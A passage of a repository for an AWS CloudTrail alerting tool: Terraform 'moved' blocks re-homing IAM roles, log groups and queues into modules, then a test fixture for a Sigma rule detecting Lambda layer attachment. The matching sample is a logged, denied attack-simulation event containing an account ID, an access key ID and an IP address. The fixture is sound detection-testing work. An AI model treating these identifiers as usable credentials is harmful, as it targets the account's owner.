module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role.trailalerts_cloudtrail_analyzer_role 27 | } 28 | 29 | moved { 30 | from = aws_iam_role.trailalerts_event_processor_role 31 | to = module.trailalerts.module.lambda_event_processor.aws_iam_role.trailalerts_event_processor_role 32 | } 33 | 34 | moved { 35 | from = aws_iam_role_policy.trailalerts_cloudtrail_analyzer_policy 36 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role_policy.trailalerts_cloudtrail_analyzer_policy 37 | } 38 | 39 | moved { 40 | from = aws_iam_role_policy.trailalerts_cloudtrail_analyzer_sqs_policy 41 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role_policy.trailalerts_cloudtrail_analyzer_sqs_policy 42 | } 43 | 44 | moved { 45 | from = aws_iam_role_policy.trailalerts_event_processor_policy 46 | to = module.trailalerts.module.lambda_event_processor.aws_iam_role_policy.trailalerts_event_processor_policy 47 | } 48 | 49 | moved { 50 | from = aws_iam_role_policy.trailalerts_event_processor_sqs_policy 51 | to = module.trailalerts.module.lambda_event_processor.aws_iam_role_policy.trailalerts_event_processor_sqs_policy 52 | } 53 | 54 | # CloudWatch Log Groups 55 | moved { 56 | from = aws_cloudwatch_log_group.trailalerts_cloudtrail_analyzer_log_group 57 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_cloudwatch_log_group.trailalerts_cloudtrail_analyzer_log_group 58 | } 59 | 60 | moved { 61 | from = aws_cloudwatch_log_group.trailalerts_event_processor_log_group 62 | to = module.trailalerts.module.lambda_event_processor.aws_cloudwatch_log_group.trailalerts_event_processor_log_group 63 | } 64 | 65 | # Lambda Layer 66 | moved { 67 | from = aws_lambda_layer_version.trailalerts_detection_layer 68 | to = module.trailalerts.module.lambda_layer.aws_lambda_layer_version.trailalerts_detection_layer 69 | } 70 | 71 | # Event Source Mappings and Notifications 72 | moved { 73 | from = aws_lambda_event_source_mapping.sqs_to_event_processor 74 | to = module.trailalerts.module.lambda_event_processor.aws_lambda_event_source_mapping.sqs_to_event_processor 75 | } 76 | 77 | moved { 78 | from = aws_s3_bucket_notification.cloudtrail_logs_notification 79 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_s3_bucket_notification.cloudtrail_logs_notification 80 | } 81 | 82 | moved { 83 | from = aws_lambda_permission.allow_s3 84 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_lambda_permission.allow_s3 85 | } 86 | 87 | # SQS Queue 88 | moved { 89 | from = aws_sqs_queue.trailalerts_alerts_queue 90 | to = module.trailalerts.module.sqs.aws_sqs_queue.trailalerts_alerts_queue 91 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_new_lambda_layer_attached_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.08", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDASZSTLCAWCAFWFS22H", 8 | "arn": "arn:aws:iam::192374575148:user/TrailDiscover", 9 | "accountId": "192374575148", 10 | "userName": "TrailDiscover", 11 | "accessKeyId": "AKIASZSTLCAWF4CPBKMF" 12 | }, 13 | "eventTime": "2024-08-18T09:51:41Z", 14 | "eventSource": "lambda.amazonaws.com", 15 | "eventName": "UpdateFunctionConfiguration20150331v2", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "109.196.12.142", 18 | "userAgent": "aws-cli/2.17.32 md/awscrt#0.21.2 ua/2.0 os/linux#5.10.16.3-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.11.9 md/pyimpl#CPython exec-env/grimoire_b2263383-47d1-4e4f-a843-419ad77464a6 cfg/retry-mode#standard md/installer#exe md/distrib#ubuntu.24 md/prompt#off md/command#lambda.update-function-configuration", 19 | "errorCode": "AccessDenied", 20 | "errorMessage": "User: arn:aws:iam::192374575148:user/TrailDiscover is not authorized to perform: lambda:UpdateFunctionConfiguration on resource: arn:aws:lambda:us-east-1:192374575148:function:my-function because no identity-based policy allows the lambda:UpdateFunctionConfiguration action", 21 | "requestParameters": { 22 | "functionName": "my-function", 23 | "layers": [ 24 | "arn:aws:lambda:us-east-1:123456789012:layer:my-layer:1", 25 | "arn:aws:lambda:us-east-1:123456789012:layer:my-other-layer:2" 26 | ] 27 | }, 28 | "responseElements": null, 29 | "requestID": "4dcd19cd-38e0-4ccb-ac5e-bc79a8105f7f", 30 | "eventID": "a97b0d3f-71ef-4db3-9d79-8d1f690e36ce", 31 | "readOnly": false, 32 | "eventType": "AwsApiCall", 33 | "managementEvent": true, 34 | "recipientAccountId": "192374575148", 35 | "eventCategory": "Management", 36 | "tlsDetails": { 37 | "tlsVersion": "TLSv1.3", 38 | "cipherSuite": "TLS_AES_128_GCM_SHA256", 39 | "clientProvidedHostHeader": "lambda.us-east-1.amazonaws.com" 40 | } 41 | } 42 | ], 43 | "should_not_match": [ 44 | { 45 | "eventVersion": "1.09", 46 | "userIdentity": { 47 | "type": "AssumedRole", 48 | "principalId": "AROEXAMPLE", 49 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 50 | "accountId": "123456789012", 51 | "accessKeyId": "ASIAXXXXXX", 52 | "sessionContext": { 53 | "sessionIssuer": { 54 | "type": "Role", 55 | "principalId": "AROEXAMPLE", 56 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 57 | "accountId": "123456789012", 58 | "userName": "ExampleUserName" 59 | }, 60 | "attributes": { 61 | "creationDate": "2025-03-09T16:39:29Z", 62 | "mfaAuthenticated": "false" 63 | } 64 | } 65 | }, 66 | "eventTime": "2025-03-09T16:39:48Z", 67 | "eventSource": "cloudtrail.amazonaws.com", 68 | "eventName": "ListNotificationHubs", 69 | "awsRegion": "us-east-1", 70 | "sourceIPAddress": "1.2.3.4", 71 | "userAgent": "ExampleAgent/1.0", 72 | "requestParameters": null, 73 | "responseElements": null, 74 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 75 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 76 | "readOnly": true, 77 | "eventType": "AwsApiCall", 78 | "managementEvent": true, 79 | "recipientAccountId": "123456789012", 80 | "eventCategory": "Management" 81 | } 82 | ] 83 | } --------------------------------------------------------------------------------